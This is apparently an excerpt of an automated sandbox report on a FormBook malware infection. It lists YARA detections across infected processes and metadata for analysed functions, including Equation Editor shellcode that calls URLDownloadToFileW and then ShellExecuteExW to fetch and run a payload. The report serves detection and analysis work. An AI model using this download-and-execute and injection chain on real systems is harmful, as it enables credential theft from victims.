Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.1069848663.0000000000140000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.1069848663.0000000000140000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.1069848663.0000000000140000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000000.995456995.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000000.995456995.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000000.995456995.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.1069986638.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.1069986638.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.1069986638.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.1069951838.0000000000380000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.1069951838.0000000000380000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.1069951838.0000000000380000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000000.995827598.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000000.995827598.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000000.995827598.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: explorer.exePID: 1860, Parent PID: 1072

General

Target ID:	10
Start time:	15:11:03
Start date:	14/05/2022
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Explorer.EXE
Imagebase:	0xff040000
File size:	3229696 bytes
MD5 hash:	38AE1B3C38FAEF56FE4907922F0385BA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000000.1028504490.000000000B6A9000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000000.1028504490.000000000B6A9000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000000.1028504490.000000000B6A9000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000000.1039502497.000000000B6A9000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000000.1039502497.000000000B6A9000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000000.1039502497.000000000B6A9000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: mstsc.exePID: 172, Parent PID: 1860

General

Target ID:	11
Start time:	15:11:32
Start date:	14/05/2022
Path:	C:\Windows\SysWOW64\mstsc.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\mstsc.exe
Imagebase:	0x3b0000
File size:	1068544 bytes
MD5 hash:	4676AAA9DDF52A50C829FEDB4EA81E54
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.1178186749.00000000000C0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.1178186749.00000000000C0000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.1178186749.00000000000C0000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.1178294756.0000000000230000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.1178294756.0000000000230000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.1178294756.0000000000230000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.1178354979.0000000000260000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.1178354979.0000000000260000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.1178354979.0000000000260000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	moderate

Show Windows behavior

Chronological Activities

Analysis Process: firefox.exePID: 1720, Parent PID: 172

General

Target ID:	13
Start time:	15:12:23
Start date:	14/05/2022
Path:	C:\Program Files (x86)\Mozilla Firefox\firefox.exe
Wow64 process (32bit):	true
Commandline:	C:\Program Files (x86)\Mozilla Firefox\Firefox.exe
Imagebase:	0x8b0000
File size:	517064 bytes
MD5 hash:	C2D924CE9EA2EE3E7B7E6A7C476619CA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000D.00000000.1175795140.00000000000C0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000000.1175795140.00000000000C0000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000000D.00000000.1175795140.00000000000C0000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000D.00000000.1174695923.00000000000C0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000000.1174695923.00000000000C0000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000000D.00000000.1174695923.00000000000C0000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	moderate

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Analysis Process: EQNEDT32.EXEPID: 2212, Parent PID: 576COMMON

Execution Graph

Execution Coverage:	31.6%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	73%
Total number of Nodes:	152
Total number of Limit Nodes:	8

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 03690396 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 91
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryW.KERNEL32(03690388), ref: 03690396

Part of subcall function 036903B0: URLDownloadToFileW.URLMON(00000000,036903C1,?,00000000,00000000), ref: 03690403
Part of subcall function 036903B0: ShellExecuteExW.SHELL32(0000003C), ref: 0369046D
Part of subcall function 036903B0: ExitProcess.KERNEL32(00000000), ref: 03690485

Strings

<, xrefs: 03690417

Memory Dump Source

Source File: 00000002.00000002.970273455.0000000003690000.00000004.00000800.00020000.00000000.sdmp, Offset: 03690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3690000_EQNEDT32.jbxd

Similarity

API ID: DownloadExecuteExitFileLibraryLoadProcessShell
String ID: <
API String ID: 2508257586-4251816714
Opcode ID: df70cb557f0f0cdc39313a3168e64637112d387d11a4c23a624985b3b3db8529
Instruction ID: 87698479ec13bd18b39ab4ed6b5b9f2f92149d1bb3c42b0886aa63b3c17d3382
Opcode Fuzzy Hash: df70cb557f0f0cdc39313a3168e64637112d387d11a4c23a624985b3b3db8529
Instruction Fuzzy Hash: 3031CEA280C3C1AFEB23D7304C6D769BFA8AF63504F5849CFD4C64A1A3E6689401C767

Uniqueness

Uniqueness Score: -1.00%

Function 0369030A Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 146
filenetworkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

URLDownloadToFileW.URLMON(00000000,036903C1,?,00000000,00000000), ref: 03690403
ShellExecuteExW.SHELL32(0000003C), ref: 0369046D
ExitProcess.KERNEL32(00000000), ref: 03690485

Strings

<, xrefs: 03690417

Memory Dump Source

Source File: 00000002.00000002.970273455.0000000003690000.00000004.00000800.00020000.00000000.sdmp, Offset: 03690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3690000_EQNEDT32.jbxd

Similarity

API ID: DownloadExecuteExitFileProcessShell
String ID: <
API String ID: 3584569557-4251816714
Opcode ID: f368398d8b5f1d8fcb6aa113a9a9da272108c7f86db9bae7c0bbafabe86727c3
Instruction ID: 147bbc2787d630762eb3807f57d64f51999577289b6ae7c497ce9c5652492473
Opcode Fuzzy Hash: f368398d8b5f1d8fcb6aa113a9a9da272108c7f86db9bae7c0bbafabe86727c3
Instruction Fuzzy Hash: EB41E0A680D3C1AFEB13D7304D69256BFA87F57500F5C8ACFC4C64A1A3E6689505C367

Uniqueness

Uniqueness Score: -1.00%

Function 03690326 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 137
filenetworkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

URLDownloadToFileW.URLMON(00000000,036903C1,?,00000000,00000000), ref: 03690403
ShellExecuteExW.SHELL32(0000003C), ref: 0369046D
ExitProcess.KERNEL32(00000000), ref: 03690485

Strings

<, xrefs: 03690417

Memory Dump Source

Source File: 00000002.00000002.970273455.0000000003690000.00000004.00000800.00020000.00000000.sdmp, Offset: 03690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3690000_EQNEDT32.jbxd

Similarity

API ID: DownloadExecuteExitFileProcessShell
String ID: <
API String ID: 3584569557-4251816714
Opcode ID: cbc6daac118b704cc3a774c0fc4988c6e3103bb3906fdc566402fdaf8be021de
Instruction ID: 12286f1e7aaf3a5c172451be78039e606d614933ee5c7cb8dbf4fa1508354f93
Opcode Fuzzy Hash: cbc6daac118b704cc3a774c0fc4988c6e3103bb3906fdc566402fdaf8be021de
Instruction Fuzzy Hash: 4541EFA680D3C1AFEB13D7304D6D65ABFA8AF53500F5C8ACFC4C64A1A3E6689105C367

Uniqueness

Uniqueness Score: -1.00%

Function 036903B0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

<, xrefs: 03690417

Memory Dump Source

Source File: 00000002.00000002.970273455.0000000003690000.00000004.00000800.00020000.00000000.sdmp, Offset: 03690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3690000_EQNEDT32.jbxd

Similarity

API ID: DownloadExecuteExitFileProcessShell
String ID: <
API String ID: 3584569557-4251816714
Opcode ID: e247971d5602c11e9c92f24210118539e524b2b60bb3fad2a932206bf81e045e
Instruction ID: 71d5946a173f1d02c9ec61335866532c619a607bf3b6d051ced1a90ff6f8ff97
Opcode Fuzzy Hash: e247971d5602c11e9c92f24210118539e524b2b60bb3fad2a932206bf81e045e
Instruction Fuzzy Hash: F5216BA680D3C19FEB23D7304C6C659BFA86F67504F5889CFD4C64A1A3E6689401C767

Uniqueness

Uniqueness Score: -1.00%

Function 03690401 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 43
filenetworkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

URLDownloadToFileW.URLMON(00000000,036903C1,?,00000000,00000000), ref: 03690403

Part of subcall function 0369044B: ShellExecuteExW.SHELL32(0000003C), ref: 0369046D
Part of subcall function 0369044B: ExitProcess.KERNEL32(00000000), ref: 03690485

Strings

<, xrefs: 03690417

Memory Dump Source

Source File: 00000002.00000002.970273455.0000000003690000.00000004.00000800.00020000.00000000.sdmp, Offset: 03690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3690000_EQNEDT32.jbxd

Similarity

API ID: DownloadExecuteExitFileProcessShell
String ID: <
API String ID: 3584569557-4251816714
Opcode ID: 41f9daba8561a70db53e067a2fb0e12596d7092a8b99f8b45ea691832e1404c1
Instruction ID: e029401943ce7feee6ef41ac41ac5732fda8f8f2f62e806390ecbec20ee64dcf
Opcode Fuzzy Hash: 41f9daba8561a70db53e067a2fb0e12596d7092a8b99f8b45ea691832e1404c1
Instruction Fuzzy Hash: C301D6B540D380EAFF61EB7498487AEBEE9AF84A10F54495FD45986152D934C804C72A

Uniqueness

Uniqueness Score: -1.00%

Function 0369044B Relevance: 3.0, APIs: 2, Instructions: 48
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000002.00000002.970273455.0000000003690000.00000004.00000800.00020000.00000000.sdmp, Offset: 03690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3690000_EQNEDT32.jbxd

Similarity

API ID: ExecuteExitProcessShell
String ID:
API String ID: 1124553745-0
Opcode ID: e449b059f35ec37d498585a96fd9926a6281ad73fbaca2b8919475d45b3c2b42
Instruction ID: 8b896b22f267b16e19c7716f8bb8e90fa5e88fc2cfd2e82a22d0d8432cfd9c90
Opcode Fuzzy Hash: e449b059f35ec37d498585a96fd9926a6281ad73fbaca2b8919475d45b3c2b42
Instruction Fuzzy Hash: 5C01F459808306E4FFB0F72849482BEFA9CEB41F04FDC895BDD9644125D514A8D3C63E

Uniqueness

Uniqueness Score: -1.00%

Function 03690462 Relevance: 3.0, APIs: 2, Instructions: 45
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ShellExecuteExW.SHELL32(0000003C), ref: 0369046D

Part of subcall function 03690480: ExitProcess.KERNEL32(00000000), ref: 03690485

Memory Dump Source

Source File: 00000002.00000002.970273455.0000000003690000.00000004.00000800.00020000.00000000.sdmp, Offset: 03690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3690000_EQNEDT32.jbxd

Similarity

API ID: ExecuteExitProcessShell
String ID:
API String ID: 1124553745-0
Opcode ID: 3e3e05e3a10e0b329dbe111682049233d00d728cb39c331fd52637c740ff1eff
Instruction ID: 3bb12c01004ea4d556b69a66b13560f1076ac8441fe29d91184ca37531f84ff5
Opcode Fuzzy Hash: 3e3e05e3a10e0b329dbe111682049233d00d728cb39c331fd52637c740ff1eff
Instruction Fuzzy Hash: 9EF02299844342E1FF70E23889583FEAB5DAB51F10FCC8957DC8200545D068A4C38739

Uniqueness

Uniqueness Score: -1.00%

Function 03690480 Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ExitProcess.KERNEL32(00000000), ref: 03690485

Memory Dump Source

Source File: 00000002.00000002.970273455.0000000003690000.00000004.00000800.00020000.00000000.sdmp, Offset: 03690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3690000_EQNEDT32.jbxd

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 288fe55cd219b45af00edd1f2cff87e2581c67c70a4523920e313d1c8e5ebd5b
Instruction ID: f49c04242a7a61e974833cf8218924656bc711991e28e6f13ed51e74029fe7d2
Opcode Fuzzy Hash: 288fe55cd219b45af00edd1f2cff87e2581c67c70a4523920e313d1c8e5ebd5b
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 03690487 Relevance: .0, Instructions: 14
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000002.00000002.970273455.0000000003690000.00000004.00000800.00020000.00000000.sdmp, Offset: 03690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3690000_EQNEDT32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 15c3e4776a16804bb5212a09f03411bf1d00a4b4976dbaad078e0c99fd6b82f5
Instruction ID: 8203ecf6b3f26aa171d15c70082f2658f6bd77ef8987c2093a1c67ba19f80820
Opcode Fuzzy Hash: 15c3e4776a16804bb5212a09f03411bf1d00a4b4976dbaad078e0c99fd6b82f5
Instruction Fuzzy Hash: 75D09E75211502DFD705DF04CA40E57F36AFFD4A21B24C669D5144B719D730E891CBA4

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 036902F1 Relevance: 1.6, APIs: 1, Instructions: 64
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ExitProcess.KERNEL32(036902DF), ref: 036902F1

Memory Dump Source

Source File: 00000002.00000002.970273455.0000000003690000.00000004.00000800.00020000.00000000.sdmp, Offset: 03690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3690000_EQNEDT32.jbxd

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: b49a11a0d75daec86fa9951426c73f9ce6ab899376186c9bd45f0c1f6fc16a65
Instruction ID: 7adf7f11e0b7ec40fbc0cf7ae31c824ff0d7e0754c65974e48297189663a29f1
Opcode Fuzzy Hash: b49a11a0d75daec86fa9951426c73f9ce6ab899376186c9bd45f0c1f6fc16a65
Instruction Fuzzy Hash: 4611045680E7C29FEF02E7701E6A145FF28BA1750075C86DFC4C48E2A3D625964AD397

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: vbc.exePID: 1200, Parent PID: 2212COMMON

Execution Graph

Execution Coverage:	15.9%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	98
Total number of Limit Nodes:	15

Executed Functions

Function 002E0224 Relevance: 11.6, Instructions: 11638
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000004.00000002.996768196.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2e0000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b00777fbd25aa83fcaace85cf101bc6ca8676ab07aab55487226028e5529ae28
Instruction ID: 68647595e17b5d53d31490adf25d5cb6085d3187549f913379cc6808f0455ef6
Opcode Fuzzy Hash: b00777fbd25aa83fcaace85cf101bc6ca8676ab07aab55487226028e5529ae28
Instruction Fuzzy Hash: D044C734A012198FD724EF34C994AE9B3B1FF8A304F5195EAD8096B761DB35AE81CF41

Uniqueness

Uniqueness Score: -1.00%

Function 006843D0 Relevance: 6.0, Strings: 4, Instructions: 983
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

UUUU, xrefs: 006848A2
4Ui, xrefs: 00684B29
4Oi, xrefs: 0068452C
4Oi, xrefs: 00684C9C

Memory Dump Source

Source File: 00000004.00000002.997698805.0000000000680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_680000_vbc.jbxd

Similarity

API ID:
String ID: 4Oi$4Oi$4Ui$UUUU
API String ID: 0-2271536380
Opcode ID: 59eaa8db0e01545a6b664ef2ee5c287d19ebdd7a83252cf0f0652886f2b62095
Instruction ID: 12120975d7a4674c425ceb4ae1b9ac4d4c3c3f4a0fb1b5d8d6348e5bdf018048
Opcode Fuzzy Hash: 59eaa8db0e01545a6b664ef2ee5c287d19ebdd7a83252cf0f0652886f2b62095
Instruction Fuzzy Hash: 68A2B475A00628CFDB64DF69C984AD9BBB2FF89304F1581E9D509AB325DB319E81CF40

Uniqueness

Uniqueness Score: -1.00%

Function 00683F29 Relevance: 3.9, Strings: 3, Instructions: 183
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

p}i, xrefs: 00683F77
4Oi, xrefs: 00683FD4
p_i, xrefs: 0068401C

Memory Dump Source

Source File: 00000004.00000002.997698805.0000000000680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_680000_vbc.jbxd

Similarity

API ID:
String ID: 4Oi$p_i$p}i
API String ID: 0-1102413639
Opcode ID: ff4369ec94c887fe5a6be8806ae907ca7ba13dc864fedff88106520b7e0490fc
Instruction ID: b1a8ba0791c825cefe007b42dc9be6899db5ea1ca9da42b38481106cc1f7293c
Opcode Fuzzy Hash: ff4369ec94c887fe5a6be8806ae907ca7ba13dc864fedff88106520b7e0490fc
Instruction Fuzzy Hash: 7271AE709046889FD719EF76E945A9EBBF3AFD5304F10C53AD108AB22AEF341985CB40

Uniqueness

Uniqueness Score: -1.00%

Function 002EDC40 Relevance: .8, Instructions: 840COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.996768196.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2e0000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 405689dc52d148491542d48476ded8b3ea62310b331041ab9b27a8e59f6ae557
Instruction ID: a887f56da0cb6bf323e55519208df501e12d9697128d762798cdc8a6b4c141a1
Opcode Fuzzy Hash: 405689dc52d148491542d48476ded8b3ea62310b331041ab9b27a8e59f6ae557
Instruction Fuzzy Hash: 8382F971C552A9CEEF28CF97C8483EDFAF5BB88305F5480A9D009A6291D7790AD9DF10

Uniqueness

Uniqueness Score: -1.00%

Function 002EDC32 Relevance: .5, Instructions: 470COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.996768196.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2e0000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e5928a04b29c7ae2d53254172c40854f242bd56d9a0d4ec81d19853afb972b43
Instruction ID: b156e37e37da1bacf7464e382ad2d7fdd6e5b23bed2cea0e97dfbe2e4da80a97
Opcode Fuzzy Hash: e5928a04b29c7ae2d53254172c40854f242bd56d9a0d4ec81d19853afb972b43
Instruction Fuzzy Hash: D4220A71C552A9CFEF28CF97C9183EDBAF5BB84305F5480E9C109AA291D7790A88DF50

Uniqueness

Uniqueness Score: -1.00%

Function 0068E208 Relevance: .2, Instructions: 172COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.997698805.0000000000680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_680000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8314e7a8ec4b3898de37bdff38244aece7714214f2093e021b46a437a6e4a390
Instruction ID: f6e48b40d3bd3256e06c86b63bae789d2c9358f22e12058c8f83c76889053115
Opcode Fuzzy Hash: 8314e7a8ec4b3898de37bdff38244aece7714214f2093e021b46a437a6e4a390
Instruction Fuzzy Hash: FF511474E05218DFDB04EFA9D8546EDBBF6BB8A300F209229E009B7395DB355942CF15

Uniqueness

Uniqueness Score: -1.00%

Function 00D57288 Relevance: 2.7, Strings: 2, Instructions: 163
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

), xrefs: 00D574C2
(, xrefs: 00D57C7E

Memory Dump Source

Source File: 00000004.00000002.997877270.0000000000D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_d50000_vbc.jbxd

Similarity

API ID:
String ID: ($)
API String ID: 0-2051389312
Opcode ID: d0dc86122a7b0ed31c0f7e50b7c633cd4f050972b960d68fe691d2e7189dff98
Instruction ID: e8509832e1f76289cac719a514970b06a9fea0788388d872820dbcef9640eb14
Opcode Fuzzy Hash: d0dc86122a7b0ed31c0f7e50b7c633cd4f050972b960d68fe691d2e7189dff98
Instruction Fuzzy Hash: 20615870D08228CFDB64DF65D844BEDB7B6AB49311F2080EAD90DA7250DB745AC8DF60

Uniqueness

Uniqueness Score: -1.00%

Function 00D5789B Relevance: 2.6, Strings: 2, Instructions: 132
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

), xrefs: 00D574C2
(, xrefs: 00D5794B

Memory Dump Source

Source File: 00000004.00000002.997877270.0000000000D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_d50000_vbc.jbxd

Similarity

API ID:
String ID: ($)
API String ID: 0-2051389312
Opcode ID: f19f9d1d2e47edc710b056687ede4130473a001f2ea40002f34451a83bff89ae
Instruction ID: 680c41743d6dc5029f8bdc70cc2686aa9586e8525a87970467256c24ae00f035
Opcode Fuzzy Hash: f19f9d1d2e47edc710b056687ede4130473a001f2ea40002f34451a83bff89ae
Instruction Fuzzy Hash: DE510574904229CFDB64DF14D885BE8BBB1BB19311F2080EAD95DA3290E7749EC8DF60

Uniqueness

Uniqueness Score: -1.00%

Function 00D57582 Relevance: 2.6, Strings: 2, Instructions: 132
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

), xrefs: 00D574C2
., xrefs: 00D575C3

Memory Dump Source

Source File: 00000004.00000002.997877270.0000000000D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_d50000_vbc.jbxd

Similarity

API ID:
String ID: )$.
API String ID: 0-3856877588
Opcode ID: 4581685454fa8e2ef8b1a48190ce0c2801658be959ce6bc44eeda4e47a96a088
Instruction ID: 242d4c5eb595b7369ebc645935f5a9937c8e6068b8b71dff512f303d42cb8cc1
Opcode Fuzzy Hash: 4581685454fa8e2ef8b1a48190ce0c2801658be959ce6bc44eeda4e47a96a088
Instruction Fuzzy Hash: 93511574908228CFDB64DF54D884BE8BBB1EB19311F2080EAD95DA7291D7749EC8DF60

Uniqueness

Uniqueness Score: -1.00%

Function 00D5783B Relevance: 2.6, Strings: 2, Instructions: 129
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

), xrefs: 00D574C2
!, xrefs: 00D57866

Memory Dump Source

Source File: 00000004.00000002.997877270.0000000000D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_d50000_vbc.jbxd

Similarity

API ID:
String ID: !$)
API String ID: 0-1972669455
Opcode ID: 3a7d13c932112188dc39398961c76e17054b11e24733e3231929614f33be338a
Instruction ID: a73507344093848dac929740b27f50726cb3a5174b81b145130531ba3e539d3b
Opcode Fuzzy Hash: 3a7d13c932112188dc39398961c76e17054b11e24733e3231929614f33be338a
Instruction Fuzzy Hash: 7D510574904229CFDB64DF54D884BECBBB5AB19311F2080EAD91DA7290EB745AC8DF60

Uniqueness

Uniqueness Score: -1.00%

Function 0068C9F0 Relevance: 1.8, APIs: 1, Instructions: 323
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0068CCB7

Memory Dump Source

Source File: 00000004.00000002.997698805.0000000000680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_680000_vbc.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: e2ec2a410564e3bb7b4cd59d603a854593a9b78f182826b18ea70abcf998f66b
Instruction ID: 2680ec4228cea9cb5831fcc1e3262c124b58e7283d459c7d0b48e7f55886af60
Opcode Fuzzy Hash: e2ec2a410564e3bb7b4cd59d603a854593a9b78f182826b18ea70abcf998f66b
Instruction Fuzzy Hash: 34C12370D0026D8FDB20DFA4C841BEDBBB2BF49314F0096A9D909B7240EB749A85CF95

Uniqueness

